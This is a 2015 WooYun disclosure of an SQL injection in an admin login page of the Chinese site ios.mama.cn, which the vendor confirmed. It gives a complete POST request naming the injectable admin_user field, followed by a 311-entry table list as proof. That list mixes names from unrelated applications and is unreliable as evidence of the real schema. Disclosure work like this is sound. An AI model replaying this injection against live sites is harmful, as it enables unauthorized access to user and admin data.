当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107821

漏洞标题:妈妈网某后台SQL注入漏洞

相关厂商:妈妈网

漏洞作者: 忽然之间

提交时间:2015-04-14 19:04

修复时间:2015-05-30 15:32

公开时间:2015-05-30 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-14: 细节已通知厂商并且等待厂商处理中
2015-04-15: 厂商已经确认,细节仅向厂商公开
2015-04-25: 细节向核心白帽子及相关领域专家公开
2015-05-05: 细节向普通白帽子公开
2015-05-15: 细节向实习白帽子公开
2015-05-30: 细节向公众公开

简要描述:

妈妈网某后台SQL注入漏洞

详细说明:

POST /index.php HTTP/1.1
Host: ios.mama.cn
Proxy-Connection: keep-alive
Content-Length: 111
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://ios.mama.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://ios.mama.cn/index.php?action=AdminLogin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: mamastatid=vlstat-1428981413000-903033601; GtC_cityid=gz; Hm_lvt_f2babe867b10ece0ff53079ad6c04981=1428981419; Hm_lpvt_f2babe867b10ece0ff53079ad6c04981=1428982072; xloginmama_service=http%253A%252F%252Fwww.gzmama.com%252Fportal.php%253Fget%253D1428982801
sid=vSX77r&frames=no&action=AdminLogin&do=UserLogin&admin_user=admin&admin_pass=admin&submit=%E6%8F%90%E4%BA%A4


注入参数 admin_user

漏洞证明:

Database: admnios
[311 tables]
+---------------------------------------+
| ACL_table |
| ALUM |
| Administratoren |
| BOOK |
| BRANCH |
| Benutzername |
| CPG_bridge |
| CUENTAS |
| CUSTOMERS |
| Category |
| Catogorie |
| ChicksPass |
| Class_Display_Sequence |
| ColdFusion8 |
| Collection |
| CountryCodes1 |
| CustomNav |
| DEPARTMENT |
| DSObject_table |
| DWE_Resource_Roles |
| DataFeedShowtag2 |
| Defect |
| EDITEUR |
| ExternalIdentifier |
| FORM |
| Factory_Output |
| Film |
| GalleryThumb |
| INSTITUTE |
| Kategorie |
| Keyword |
| Konten |
| Konto |
| LT_CUSTOM3 |
| LT_EVENTO |
| LT_SITUACAO |
| Lake |
| Languages |
| Linkdesc_table |
| LoginIP |
| MOMENT |
| M_CADASTRO_GERAL |
| M_EMAIL_FILA |
| MetadataSchemaRegistry |
| MountainOnIsland |
| Orders |
| Organization |
| POINT |
| PRODUTO |
| PROYECTO |
| PZ |
| Pays |
| PerfPassword |
| Politics |
| Priority |
| ProjectsTable |
| ProxyPriceInfo |
| QRTZ_TRIGGER_LISTENERS |
| SQLDATES |
| SS_orders |
| Serie |
| Severity |
| TBLREPORTS |
| THOT_CONCEPT |
| THOT_LANGUAGE |
| THOT_TARGET |
| THOT_YEAR |
| TIL_IDIOTON |
| UM_PERMISSIONS |
| UM_USER_ROLES |
| UserAdmin |
| Utilisateurs |
| Variants |
| Venue |
| WROTE |
| Session |
| a_admin |
| address_book |
| addresses |
| admin_psw |
| adminname |
| aidf |
| array_data |
| array_test |
| auteur |
| authenticate |
| bayview |
| be_users |
| binn_articles_messages |
| binn_basket_templ |
| binn_cache |
| binn_cform |
| binn_ct_templ |
| binn_form39 |
| binn_forum_threads |
| binn_order_elems |
| binn_site_users_rights |
| binn_submit_timeout |
| binn_templates |
| borders |
| cdb_attachments |
| cdb_bbcodes |
| cdb_faqs |
| cdb_imagetypes |
| cdb_itempool |
| cdb_medals |
| cdb_paymentlog |
| cdv_curation |
| cell_line |
| child_test |
| cmDigitalAsset |
| cmEvent |
| cocktail_person |
| configlist |
| control |
| creditcards |
| customurl |
| datasets |
| dblist |
| dcerpcrequests |
| deducao |
| dept_location |
| diplomatie |
| div_generation |
| div_stock_parent |
| div_treatment |
| dtb_bat_order_daily_hour |
| dtb_bat_relate_products |
| dtb_classcategory |
| dtb_mailmaga_template |
| dtb_question |
| dtb_table_comment |
| dtb_templates |
| dw |
| empresa_atividade |
| encompasses |
| exchangerate |
| ezin_sections |
| ezsearch_return_count_new |
| f_attributedefinition |
| files |
| flow |
| forum |
| forum_post |
| forums |
| framework_email |
| fruit |
| ganatlebe_ge |
| geo_Estuary |
| graphs |
| grau_escolaridade |
| gws_news |
| gws_page |
| hilfe |
| house_extensions |
| index |
| inscription |
| intGroups |
| investigator |
| itemnotafiscal |
| items_template |
| jiveGroupProp |
| jiveRoster |
| jos_content_frontpage |
| jos_docman_licenses |
| jos_menu_types |
| jos_migration_backlinks |
| jos_poll_menu |
| jos_polls |
| jos_vm_manufacturer |
| jos_vm_orders |
| jos_vm_product |
| jos_vm_product_relations |
| jos_vm_shipping_label |
| jos_vm_state |
| klassen |
| legacy_things |
| lookup |
| m_news |
| makemodel |
| manage |
| map_event |
| mapdata |
| maxcodcorreo |
| meetings |
| metadata |
| mlattach |
| mlmail |
| mucRoomProp |
| mymps_config |
| mymps_crons |
| nuke_bbposts |
| nuke_gallery_rate_check |
| nuke_groups |
| nuke_groups_points |
| nuke_journal_comments |
| nuke_poll_desc |
| nuke_referer |
| nuke_related |
| oil_biolmed_entity |
| oil_biolmed_technician |
| oil_content |
| oil_core_log_searches |
| oil_jf_content |
| oil_languages |
| oil_phocagallery_img_votes_statistics |
| oil_sections |
| orgs |
| osc_specials |
| p0fs |
| panel |
| pay_melodies |
| payment |
| pc |
| perfil |
| pessoa |
| phorum_session |
| phorum_user |
| phpbb_config |
| phpbb_privmsgs |
| phpbb_themes |
| phpbb_vote_results |
| phpbb_vote_voters |
| pools |
| produtos |
| profile_pictures |
| publisher |
| pw_wordfb |
| qrtz_fired_triggers |
| rating |
| rec_jobs |
| reg |
| reguser |
| roles |
| root |
| roster |
| rss_category |
| seq_gen |
| server |
| sf_guard_group |
| sf_guard_user |
| sf_guard_user_group |
| site_environment |
| site_iwis |
| skins |
| smallnuke_members |
| smf_members |
| sounds |
| spip_auteurs_articles |
| spip_documents_breves |
| spip_referers |
| spip_versions |
| spt_datatype_info |
| statuses |
| stellen |
| store |
| store1 |
| t_snap |
| tables_priv |
| tb_login |
| tb_member |
| tbaccounts |
| tblLogBookImport |
| tblNews |
| tbl_admin |
| tbl_admins |
| tbl_nguoidungs |
| tblblogcomments |
| tblblogsubscribers |
| tblclient |
| tblnguoidung |
| tblogin |
| tblogins |
| tbluseraccount |
| tblusers |
| transfers |
| tt_address |
| tutorial |
| tx_tcdirectmail_clicklinks |
| typeFacture |
| user_connection |
| user_name |
| user_types |
| user_usrnm |
| userpassword |
| users_tmp |
| usrnam |
| uvw_Category |
| uvw_Preferences |
| vcd_Covers |
| vcd_VcdToPornCategories |
| vendedores |
| vendor_types |
| verwalten |
| verwaltet |
| videos |
| voodoo_members |
| warehouse |
| way_nodes |
| webcal_entry_ext_user |
| webcal_user |
| webcal_view |
| webmaster |
| win |
| wp_pod_types |
| wp_users |
| xristes |
| yhm |
| zipcodes |
| zoph_albums |

修复方案:

过滤

版权声明:转载请注明来源 忽然之间@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-04-15 15:31

厂商回复:

谢谢

最新状态:

暂无


漏洞评价:

评论

  1. 2015-04-14 20:28 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    看来这妈妈网还真成大厂商了

  2. 2015-04-15 19:42 | O夜莺O ( 路人 | Rank:2 漏洞数:1 | 继续为网络安全护航。)

    大神你QQ多少,求请教。